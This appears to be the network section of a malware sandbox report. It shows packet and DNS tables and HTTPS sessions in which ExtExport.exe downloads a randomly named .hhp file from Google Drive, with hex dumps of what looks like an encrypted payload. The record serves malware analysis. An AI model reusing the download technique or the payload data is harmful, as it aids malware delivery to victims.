Nov 28, 2022 19:03:20.046467066 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.046641111 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.047004938 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.047130108 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.047193050 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.047226906 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.047241926 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.047297955 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.047379017 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.047815084 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.047936916 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.047955990 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.047966957 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.048073053 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.048098087 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.048145056 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.048244953 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.048325062 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.048340082 CET	443	49803	142.250.186.65	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2022 19:03:18.583724976 CET	54443	53	192.168.11.20	1.1.1.1
Nov 28, 2022 19:03:18.594630003 CET	53	54443	1.1.1.1	192.168.11.20
Nov 28, 2022 19:03:19.510133982 CET	60672	53	192.168.11.20	1.1.1.1
Nov 28, 2022 19:03:19.541562080 CET	53	60672	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 28, 2022 19:03:18.583724976 CET	192.168.11.20	1.1.1.1	0xbc76	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 28, 2022 19:03:19.510133982 CET	192.168.11.20	1.1.1.1	0xa3a7	Standard query (0)	doc-04-90-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 28, 2022 19:03:18.594630003 CET	1.1.1.1	192.168.11.20	0xbc76	No error (0)	drive.google.com		142.250.74.206	A (IP address)	IN (0x0001)	false
Nov 28, 2022 19:03:19.541562080 CET	1.1.1.1	192.168.11.20	0xa3a7	No error (0)	doc-04-90-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 28, 2022 19:03:19.541562080 CET	1.1.1.1	192.168.11.20	0xa3a7	No error (0)	googlehosted.l.googleusercontent.com		142.250.186.65	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

doc-04-90-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49802	142.250.74.206	443	C:\Program Files (x86)\Internet Explorer\ExtExport.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-28 18:03:18 UTC	0	OUT	GET /uc?export=download&id=1lmBjkmJX2WixZUvaKmoyB8cex-DCePE2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2022-11-28 18:03:19 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 28 Nov 2022 18:03:19 GMT Location: https://doc-04-90-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cus72g9uti9p4sqam1k45t4h3de3hhkd/1669658550000/01268323115933183181//1lmBjkmJX2WixZUvaKmoyB8cex-DCePE2?e=download&uuid=e0f4c7f4-041c-4571-801a-cda7ca0f1ae2 Strict-Transport-Security: max-age=31536000 Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]} Content-Security-Policy: script-src 'nonce-NRibADkNt0mXJdsLdBV4Rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp" Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49803	142.250.186.65	443	C:\Program Files (x86)\Internet Explorer\ExtExport.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-28 18:03:19 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cus72g9uti9p4sqam1k45t4h3de3hhkd/1669658550000/01268323115933183181/*/1lmBjkmJX2WixZUvaKmoyB8cex-DCePE2?e=download&uuid=e0f4c7f4-041c-4571-801a-cda7ca0f1ae2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-04-90-docs.googleusercontent.com Connection: Keep-Alive
2022-11-28 18:03:20 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdt7d4VcPem9nxCbEjC5LhertfMNUYjm_AbgD2p8eAiLu4PHkATpRsXLswOD9CDwX-9xlkz8GZWwKdXQpn6lGWqbZw Content-Type: application/octet-stream Content-Disposition: attachment; filename="VGhkeyHRfTtkEYFgryhIy158.hhp"; filename=UTF-8''VGhkeyHRfTtkEYFgryhIy158.hhp Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context Access-Control-Allow-Methods: GET,HEAD,OPTIONS Content-Length: 106560 Date: Mon, 28 Nov 2022 18:03:19 GMT Expires: Mon, 28 Nov 2022 18:03:19 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=cmuwkg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2022-11-28 18:03:20 UTC	6	IN	Data Raw: f2 50 08 fe 0b 35 86 25 bc a9 dd 51 73 d3 c8 99 b4 15 cf be b9 60 b1 52 b7 26 bc 1e 61 de 4e 63 d8 64 68 74 27 ac e9 2b 20 7b 75 2a 4b b4 ad 3a 79 22 0b 3a 63 cd d9 c4 63 e4 aa 1a 35 cc d9 05 15 4c 3d 42 d1 e0 36 6f fd 54 1b 64 ca 87 32 68 81 6e d3 9a 00 f1 e3 6c 6f 1b 32 21 58 4a 52 49 b0 16 67 e9 0b cd 47 af fc 81 70 98 7e 29 8d c1 49 9c dc 31 bc 5b e5 91 f4 85 b7 00 75 97 62 50 ec b4 bb 7a 2d 23 52 96 3b ab 14 9f b6 5a eb 36 a7 c0 76 cb db e7 c6 d7 dd 09 d7 e8 fc dd 3f b2 6f 69 21 0c 23 a4 00 34 4c 8e b2 a9 f1 f4 46 26 5d 26 e4 fd 78 8d ad f9 e0 38 82 fb cd 8e cb 6b 06 25 45 07 30 13 14 13 3d 69 b3 1f 4c ae 09 21 29 d9 fe 11 82 66 a4 9c c6 93 c6 5a f6 d7 76 f7 20 91 b2 52 98 f3 0f 0f ca de 1f 59 48 ea a4 26 e3 2d 77 63 1b 17 33 4e a2 19 ec ab 7d fb e6 Data Ascii: P5%Qs`R&aNcdht'+ {u*K:y":cc5L=B6oTd2hnlo2!XJRIgGp~)I1[ubPz-#R;Z6v?oi!#4LF&]&x8k%E0=iL!)fZv RYH&-wc3N}
2022-11-28 18:03:20 UTC	10	IN	Data Raw: 23 7f 9f 27 62 45 f6 11 06 8e 80 6e ba c5 90 d6 e5 0b b9 95 39 42 11 6c a2 a9 85 75 52 63 bf 1b 74 4c 8d 03 43 e6 8c 8b 4b df 4b e7 3c 12 33 77 d6 cc 84 db d2 95 80 ca e0 bd 2b dd 14 9e a4 40 72 b1 a0 c6 30 50 5e 38 33 fb 6c a4 57 16 65 dd 83 26 a7 3b 42 43 a5 8e 1f 33 49 75 07 64 9c 7e 29 c5 48 cf bc d8 31 bc d2 6b 81 f0 85 b7 b8 6b 6c 8c fb d1 62 56 7b 9b 2e eb d2 5b 13 c4 13 48 bc b0 e8 77 02 df fa a9 59 61 96 7b 6b 41 32 2f 3a 10 dd ca 89 70 ae 0c 60 cc e9 e5 a6 dc 58 75 38 d4 02 03 8e 01 61 56 81 a0 f3 b6 f1 07 3b c2 0b 70 62 ca e8 6e 70 ae 32 4c ba 34 07 bd 12 c1 02 a0 8c a9 0d 6b 31 53 cb e7 b8 9c 03 4d f2 7c 7b 60 5a 26 18 6c bb 14 5f 19 a2 f7 ec 6f 34 c7 7b b2 8f 6b 81 13 22 16 79 25 e7 23 cd ec c7 f0 7c 0b a4 9d 84 e4 87 f1 b2 a9 78 60 91 5b 51 Data Ascii: #'bEn9BluRctLCKK<3w+@r0P^83lWe&;BC3Iud~)H1kklbV{.[HwYa{kA2/:p`Xu8aV;pbnp2L4k1SM\|{`Z&l_o4{k"y%#\|x`[Q
2022-11-28 18:03:20 UTC	14	IN	Data Raw: 3b eb 98 e5 02 95 d0 a5 49 c7 09 a4 52 79 75 63 e0 84 1e b6 0c cc 80 ff 21 1a ff 3f da 4b 3a 47 66 b0 0a eb f3 af 50 7c ad 14 3a 4b c9 90 06 d7 df 68 be be 6c 35 fa 3b 58 76 83 8c eb 6c 5b 09 cd 54 50 20 52 b6 a5 16 37 a8 0b 9d b8 ba f8 d1 31 98 23 ea d8 4a a5 17 99 39 1f 7b 1b d8 f4 d8 74 69 80 b7 9c 19 e2 56 42 77 2d 92 98 c5 3c 13 b6 f3 85 32 bf 9f 26 a3 73 44 d6 88 a1 66 8f a4 a7 db f5 26 22 3c c6 19 ab 8d 06 d6 75 a5 8c b2 57 65 86 7b 45 56 58 f5 0a 29 98 d0 48 23 c1 38 82 04 b8 82 34 1e c2 17 ed a4 7b ea 89 52 86 05 f5 e2 ac d6 f7 9d 40 5d 83 08 0e ca b2 ce f8 38 72 27 21 b8 35 d1 41 ba fe f3 92 96 e6 f4 7c 99 e4 1f d9 49 04 8d 21 b2 a9 88 fd b3 7d 15 e2 cc 1b 00 75 a6 a4 7c 13 4c bb 7a bd c7 59 76 a4 67 71 59 ca f1 74 8e 9e 9a bf 12 9c ab 2b 86 76 Data Ascii: ;IRyuc!?K:GfP\|:Khl5;Xvl[TP R71#J9{tiVBw-<2&sDf&"<uWe{EVX)H#84{R@]8r'!5A\|I!}u\|LzYvgqYt+v
2022-11-28 18:03:20 UTC	18	IN	Data Raw: 48 2a 08 a2 40 dd c4 85 06 c5 a3 18 0b f0 6f 10 8c ee e9 b8 1b bd b0 87 36 32 16 c7 42 ba 01 65 67 25 3e 19 8c 5b 8e cd 97 c6 1b db 65 d0 ac 20 39 a4 f7 58 21 32 4a 3a dc a8 9b 8c 83 09 25 13 59 03 7e 8f ed 76 d6 5d 9c 8a Data Ascii: H*@o62Beg%>[e 9X!2J:%Y~v]
2022-11-28 18:03:20 UTC	18	IN	Data Raw: c9 57 dd 8f 9b b5 c1 9c b4 0c 3c 46 c7 8a 6b 14 54 fe 8b 58 87 a4 2e 16 ec 60 db 84 ab e2 9d 9b 38 ba 88 69 d8 f1 cd ca e5 77 4d cd 5b 4d 2b e4 b6 bc 1c 0b 29 a5 07 af b2 57 65 86 7b 45 56 58 3e b1 8c 9f d0 48 f0 32 c7 7d 04 b8 9e 34 1e c6 17 48 f1 47 6f 5f 7d e0 4e 49 81 04 52 4f e4 32 e8 01 66 5b 22 56 c4 72 cf 72 82 74 84 b0 07 6e 64 20 13 22 9f 49 f2 9f 97 d9 5e 1d 16 5a 40 9e 7e 9e 31 e2 b3 da 33 7e 0e 3a 8d 18 64 30 81 1b 67 51 11 ab 40 f9 1b c4 e7 6c 51 e4 0f a5 2f b6 55 87 62 88 f4 ba db b4 6f b2 bc 1f 58 57 86 46 be 95 1e 83 95 c2 ab af 12 4b e0 7c e6 75 ff 23 60 9d 8d 9c 7f 1f d8 a6 47 1c 8e 94 3d de 66 87 dd e3 9a e3 80 1c cb 84 74 fe f6 62 1e cd f7 33 e8 54 64 e3 01 9a 69 92 d5 38 45 ab 50 e7 0f 4b 8d a7 b7 21 08 61 06 6d a8 b9 8a e2 83 6a f1 Data Ascii: W<FkTX.`8iwM[M+)We{EVX>H2}4HGo_}NIRO2f["Vrrtnd "I^Z@~13~:d0gQ@lQ/UboXWFK\|u#`G=ftb3Tdi8EPK!amj
2022-11-28 18:03:20 UTC	19	IN	Data Raw: 11 d1 e8 e9 35 cb a6 7f 82 bc 17 7c 96 1f b3 21 67 5e ec 6f 2d c8 c0 0b 93 5f 69 14 10 87 7c e6 95 70 8b 0c d5 b5 c5 26 c2 14 7b 32 22 90 1f 61 d5 d2 a5 24 de 63 72 f4 2d 9c 22 f7 4d f1 f1 35 cd a4 f7 be 66 4e 7c 7d 08 16 a0 57 66 81 72 d8 fc c9 a2 cd 17 9b 2e a9 4f 55 38 61 ec 7c 48 6a 19 17 8d b1 1d 8f 7c be 4c 59 74 c6 cb 6a 3d 79 8c c6 23 40 54 8d fa 7a e2 1e 16 cf c6 25 17 62 d1 ff 38 08 a9 3e 7b 0f c9 ae b9 ff 35 ac 6f bc a9 6c 21 e4 41 dc 75 c5 28 e8 30 1f 4e 70 65 a0 35 53 60 80 57 f9 18 43 1f 9a 00 bc eb 91 ea f3 cb e7 8a 06 37 c5 66 b6 a6 33 ac a5 97 bf c7 4f 51 77 90 35 18 c1 7e 43 dd 43 a7 82 30 01 51 b1 fc b1 62 8e 59 ec bb d3 bb 47 55 de 73 15 c8 d0 32 5e b4 7f 60 39 9b 0e 94 9c 03 34 cb 6d 14 6c 29 5b 27 e0 34 c0 92 de be cc d6 cc 33 7f d4 Data Ascii: 5\|!g^o-_i\|p&{2"a$cr-"M5fN\|}Wfr.OU8a\|Hj\|LYtj=y#@Tz%b8>{5ol!Au(0Npe5S`WC7f3OQw5~CC0QbYGUs2^`94ml)['43
2022-11-28 18:03:20 UTC	20	IN	Data Raw: a1 69 90 1f df 72 43 b0 92 7f 42 1c ae 7a 95 ea 17 6a 57 f2 e0 4c 52 93 37 c7 f8 94 be 37 23 25 3b d1 48 6c 68 00 04 4f 49 e3 f7 86 ee ad f8 87 c7 82 3d 69 72 28 68 44 7c 08 c2 46 a9 ed 2b 64 30 91 88 5a e1 7f a2 4d dc fb 9e d7 73 51 e4 f1 4d 89 40 a6 87 62 84 38 aa 6d 36 69 6f dd b3 9c 06 d6 2e af 07 63 9d 3a d5 b3 aa b4 31 e9 7d ca d9 45 7e f5 20 73 95 dd 09 30 0f 47 96 d7 e0 a4 29 fb 3d d5 fc 65 60 44 59 75 83 74 f0 93 4a e6 75 cb 9a 82 91 f2 5e 6b 5c 08 3c 46 31 f0 36 f0 93 1c 96 37 de 34 93 d0 b4 8a fd ab b8 7e e4 33 f0 85 02 23 e0 df ab 4b 46 f5 f1 d8 96 08 44 2f d2 01 04 dd 0d c0 c3 f6 a4 c8 75 f0 79 25 cc fb 79 e9 c3 12 3a c0 8e e1 45 38 47 98 17 ab 8c 02 70 8d ec a4 2b 4c e8 a9 cb df d2 3f c7 e4 21 92 cb 69 f7 b3 a2 d5 86 57 d9 dd 64 3b 07 57 d5 Data Ascii: irCBzjWLR77#%;HlhOI=ir(hD\|F+d0ZMsQM@b8m6io.c:1}E~ s0G)=e`DYutJu^k\<F1674~3#KFD/uy%y:E8Gp+L?!iWd;W
2022-11-28 18:03:20 UTC	21	IN	Data Raw: 50 94 e0 11 9f 7c 98 13 d6 36 dc 4f fc af b4 67 90 19 51 49 17 b0 0e 7d 8d 7c be 9a 4e 16 2f cb 45 3d 79 5c 3e 20 b7 ce 24 c6 25 24 49 fe 17 70 8c 80 ff 48 b0 48 2b b9 8d d8 98 ea 8f 40 f3 0e f2 78 37 c5 6b e7 34 f4 55 43 2c ce e9 32 1f 5d f8 4f 27 8f 2a ed bf f3 7e 51 0e 63 47 1d a2 6c 28 56 bf 45 cc 84 93 c1 47 56 39 59 dc 21 e8 38 b8 6f cc 89 50 60 fe 3a 06 f8 ea c0 ff d6 fd 02 a8 46 ac cb a5 94 8f 3c 7a af 7d 13 95 1b e2 7f 1c 6c 8b 52 c3 02 37 bd 83 70 29 52 91 36 a5 66 ed e0 93 d6 33 77 30 5c 17 d5 9d 9d 76 5f 9b 9d 88 d6 f4 6e 02 12 62 fd a6 61 2b 94 c8 27 7e 47 6e 66 54 26 50 72 bf a8 b5 44 99 4b b3 7e b8 4d be af 99 8c ea b6 e0 f0 f6 c8 6b 9e 56 75 09 06 6c fe 88 58 48 7f 9f 4b b1 e0 0b 0f 9e 1a f3 51 a8 4f 28 b4 a6 d7 61 05 f9 02 f3 6f d5 87 cd Data Ascii: P\|6OgQI}\|N/E=y\> $%$IpHH+@x7k4UC,2]O'*~QcGl(VEGV9Y!8oP`:F<z}lR7p)R6f3w0\v_nba+'~GnfT&PrDK~MkVulXHKQO(ao
2022-11-28 18:03:20 UTC	23	IN	Data Raw: 59 c2 71 7d 81 2b 13 a4 e8 7f 86 24 8e fc c2 68 63 da ce 50 3e 23 20 10 2f f3 80 3a bb 9e fd 3f c1 80 9b 72 a6 0b 5f 45 56 8f 21 a3 6b 11 31 a6 37 6b b4 aa 5e 87 bc 7e 82 6e 84 4f c7 01 f4 78 a0 b2 5e 1d 71 75 8b 29 77 b9 6a 14 9e 33 f5 b7 a9 f5 a5 48 18 6a 76 d2 bf 55 95 c3 58 e3 09 63 36 4c 75 1b 84 1a d8 34 7a 12 f6 0b f4 7b ac b9 50 b9 56 41 8f 11 23 fa 0c 44 81 86 ca eb fe b9 9b f4 d2 4b 15 74 69 fa 6e 62 69 5d 24 32 80 e4 19 bc 1e 3d d3 47 3d 5d f4 6d d6 1c b4 04 3b cd 31 96 2a ee b7 d8 24 de b0 d9 a0 e2 8d dc 82 ce 47 33 84 2f c0 29 32 8c a4 0e fc 0a a8 81 f1 b5 b3 0c 47 19 c7 b6 11 22 a6 fd 86 3d 23 f9 1b 9a 46 df 88 7a ab c4 4f f7 12 91 45 cc 48 37 40 de cb 83 e2 c4 4c 18 2d 81 61 49 41 93 24 2d 8b 7a 3d 93 7f 76 06 95 3e 1f 31 12 ab 73 f3 64 d9 Data Ascii: Yq}+$hcP># /:?r_EV!k17k^~nOx^qu)wj3HjvUXc6Lu4z{PVA#DKtinbi]$2=G=]m;1*$G3/)2G"=#FzOEH7@L-aIA$-z=v>1sd
2022-11-28 18:03:20 UTC	24	IN	Data Raw: 35 9c f0 00 4f 2e 1a 57 bb ab 1b 78 6f 73 3d c9 eb a0 36 0e 3a 96 d5 b8 50 7a 36 a3 10 ce f0 cb 40 a4 c0 e9 61 1a 1a da 10 6d aa 0d c3 06 36 fd 33 fc ed 01 51 f0 0d 4e 9d 81 51 61 3b 87 6f 0a db f3 ce c9 f1 5e ea 5d 94 e9 da ec 1f d1 d5 ef fa 51 e3 43 6f e6 de 3c 70 a0 63 4d b9 61 27 13 4e 57 20 d7 d2 85 9c 41 9c 2f 8f 1c 14 eb 11 75 0f 63 36 7a 07 49 77 a5 65 d9 a4 4a 31 c8 ed c9 d8 8f 16 c8 76 43 12 6c fa 26 49 85 82 05 26 c8 e3 d7 61 d3 f9 55 7a ff 60 2d 55 35 6c 9b 56 f5 a0 00 59 38 12 ad cb ca 50 37 86 a4 55 1b 64 3a ce 64 69 bd bc ab 82 8b b4 ef ef cc 64 f3 c2 5f 41 88 ca d0 12 67 60 13 7d 45 46 c1 80 70 98 71 9f cb c3 88 7f d2 3a 64 df 3e e9 ea 0e f2 0c 06 75 1d 91 00 ac 80 97 52 57 44 5b 11 c0 96 b3 7f 7b 36 4e 7e b0 bf a9 a8 88 a1 aa 0a 22 f4 4a Data Ascii: 5O.Wxos=6:Pz6@am63QNQa;o^]QCo<pcMa'NW A/uc6zIweJ1vCl&I&aUz`-U5lVY8P7Ud:did_Ag`}EFpq:d>uRWD[{6N~"J
2022-11-28 18:03:20 UTC	25	IN	Data Raw: 62 75 6a cb 34 60 72 f2 f5 9a 0a 40 21 27 4a 57 51 88 3a 99 63 5d cc 58 d4 c4 a1 0f 80 09 16 73 b6 3e 60 b9 7f 9a 09 af ec a9 02 3f cb 3b eb c6 ff 2b 67 a0 a0 2d 85 f4 31 f3 fb 43 4a 31 86 e2 a7 c7 f4 3c 29 e9 f9 71 de 43 05 0a 20 09 45 d9 4c a9 19 83 a7 a1 61 ea 73 fc 9e 2a 68 49 c0 65 a5 8b ea 47 33 a8 10 ff b7 d2 26 ff bf bc b3 33 e0 ce 45 ea c5 79 53 20 94 ae 09 a4 98 8f 15 79 a3 41 4a dd 55 f5 fd 50 3f 7c 0c 48 b9 aa d8 40 22 2e ab 53 0e cc e1 e1 44 87 03 fb a2 15 4b 50 9f 78 86 34 e1 e9 37 95 28 05 f0 5b 12 4a 3e 8b e6 c2 10 33 c0 25 52 1e c4 a5 8a 70 de 1b 8a 31 b9 ab d6 ef 0a 4c c5 f7 6b dc a6 e7 6f 86 51 b9 6f 97 40 4d 13 8b 18 04 2a 5e 53 68 aa 5d 17 f6 cc b7 91 d6 ed 86 e6 53 a8 c6 ec 2d c1 83 9c 24 4a 82 fc b2 95 67 ae 06 0e 8d 4d 87 60 84 7d Data Ascii: buj4`r@!'JWQ:c]Xs>`?;+g-1CJ1<)qC ELashIeG3&3EyS yAJUP?\|H@".SDKPx47([J>3%Rp1LkoQo@M^Sh]S-$JgM`}
2022-11-28 18:03:20 UTC	26	IN	Data Raw: c5 34 bd af dc db 44 a5 93 5b 4e a7 93 91 f3 0d e7 43 46 3b b7 53 01 57 3c d5 eb 0d 66 0d c9 2d 91 b5 92 62 62 53 41 26 e6 2d 8a 7d 93 21 bc 45 dc 39 c2 13 45 9d 8d 66 53 c5 a0 fa fe 5c 17 09 b6 93 3f 7b a3 72 03 6b d2 3c 2c ea 64 3f ad 5f 4e 8b 81 1a 3f 08 32 68 f4 b5 23 31 dc 09 72 10 4e e4 53 f1 36 36 7a 55 0c e8 e4 a7 0b b3 d1 e4 cd 1a a0 c1 17 41 e9 61 a3 62 cd 96 ac ad cf 41 2f c6 f5 cc d0 02 1c 17 30 60 ea 0c 5a 99 f6 85 b7 c7 c0 6b 66 51 e2 ab 56 9c 27 5a a4 a4 91 e3 4c 56 8d 0f 8a 09 fd 4c 01 ed 41 43 6d 5a 43 e7 33 87 ca e4 39 8c 46 1f 9b 03 01 3e 24 89 93 18 8b 04 f8 47 44 50 cf 3c 88 67 86 05 60 86 c0 b3 44 10 c4 d8 23 95 06 17 c2 a0 8b 7f 5d e0 3e 20 f8 71 91 89 f3 01 ed 1d 3b 43 7e c6 4d 44 85 d8 5d 0d 83 84 e3 9e a1 6c 68 aa 9a b3 94 e7 e7 Data Ascii: 4D[NCF;SW<f-bbSA&-}!E9EfS\?{rk<,d?_N?2h#1rNS66zUAabA/0`ZkfQV'ZLVLACmZC39F>$GDP<g`D#]> q;C~MD]lh
2022-11-28 18:03:20 UTC	27	IN	Data Raw: 36 e1 be 04 89 66 38 9a c9 20 c4 9d 6f 10 a6 e4 2a 2a 9a fb ac ea 35 81 39 4d 8d 8f 36 88 7c 6f 32 0e e9 f3 d1 b5 d6 92 ee 9e fc d2 34 6c f5 18 63 9f c7 5c 56 41 35 55 7f a8 f6 c1 8c 0c ed 10 81 23 03 31 bb f2 ba 73 58 d4 52 13 82 1c 05 a2 75 4a 50 9f de 76 e7 6a 3e 39 be e9 46 e3 ce 4b ab 7b 13 bc 98 d3 87 ad 7d 52 a1 d4 a5 8a d6 20 cc 2a 1a 3e b1 fe 24 a0 17 74 65 68 00 f5 85 6d ec 51 86 56 49 cc 61 86 08 00 47 77 57 d8 bb b7 49 e9 83 c0 22 e4 88 fa 6e 6b 6f 02 c0 45 82 1e a9 53 af 4f 39 9c 17 81 70 f7 91 f2 f0 5a 0c 9b 5c e8 52 c7 ac f6 a7 68 21 a5 08 e5 4b 37 51 59 86 fc f0 17 fb 8d 7c 47 48 74 05 82 e9 ed d5 c4 b7 7d f1 64 09 9f ca ae 58 d6 ec a9 02 e1 be db ff af 1e 6f b8 5c 85 da 35 ec e6 9d 8c b4 41 33 ff 32 0e df b8 3d 47 5a e5 1c 96 20 9e 74 12 Data Ascii: 6f8 o*59M6\|o24lc\VA5U#1sXRuJPvj>9FK{}R >$tehmQVIaGwWI"nkoESO9pZ\Rh!K7QY\|GHt}dXo\5A32=GZ t
